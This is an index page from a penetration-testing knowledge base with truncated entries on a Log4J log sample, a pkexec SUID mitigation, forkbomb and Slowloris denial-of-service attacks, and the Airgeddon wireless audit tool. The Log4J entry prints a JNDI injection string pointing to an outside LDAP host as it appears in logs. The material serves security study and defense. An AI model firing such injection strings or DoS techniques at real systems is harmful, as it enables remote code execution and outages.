Entries for: Penetration-Testing!
<< Back

Sub Categories


How does a Fail Log4J Attack look in Logfiles

Views: 458
Created: 2022-01-29 22:55:42
Modified: 2023-09-22 13:45:21

[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client] AH10188: Max-Forwards value &#39;${jndi:ldap://X.X.X.X:1389/a}&#39; could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}<br /> [Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client] AH00898: Max-Forwards request...

Polkit PKExec Vulnerability

Views: 303
Created: 2022-01-29 22:58:22
Modified: 2023-09-23 22:49:18

The most actual systems have an update for this. If not you can close this vulnerability by executing:<br /> chmod 0755 /usr/bin/pkexec This will remove the SUID Bit from the File.<br /> More info here: Image for the Thumbnail: ...

Denial Of Service

DDOS Forkbomb

Views: 647
Created: 2020-08-25 02:17:30
Modified: 2023-09-24 10:40:41

A forkbomb is a denial of service bash command that blocks the server, duo to high cpu load.<br /> The script is creating a recursive function and is infinitly launching itself - so the system will be blocked.<br /> <br /> Usefull for testing vHosts which are sharing ressources if high load is affecting other hosts.<br /> (T...

DDOS Slowloris

Views: 647
Created: 2020-08-25 01:41:02
Modified: 2023-09-23 21:33:14

Slowloris is a Denial of Service attack tool that starts a lot of HTTP requests<br /> to take down its target. A weak server can be taken down with a single pc if you have<br /> enough CPU power and enough threads running. But thats not guaranteed.<br /> <br /> Has been tested and approved as working for small web servers wi...


HACKING Airgeddon

Views: 644
Created: 2020-08-25 02:00:07
Modified: 2023-09-23 21:31:40

Airgeddon is a multi use wireless audit tool.<br /> Its possible to pentest WEP and WPA2 Networks. Its included into a security parrot and KALI installation. The main features are Evil Twin Attacks/ Package Capturing and there is a Bruteforce Cracker included with aircrack-ng - but for better performance you should use something like hashcat ...

Warning: Array to string conversion in /home/bugfish/public_html/_site/btm/init.php on line 82
Switches: 0 | Arrivals: 0 | Visits: 0
This Website is using Session Cookies for Site Functionality.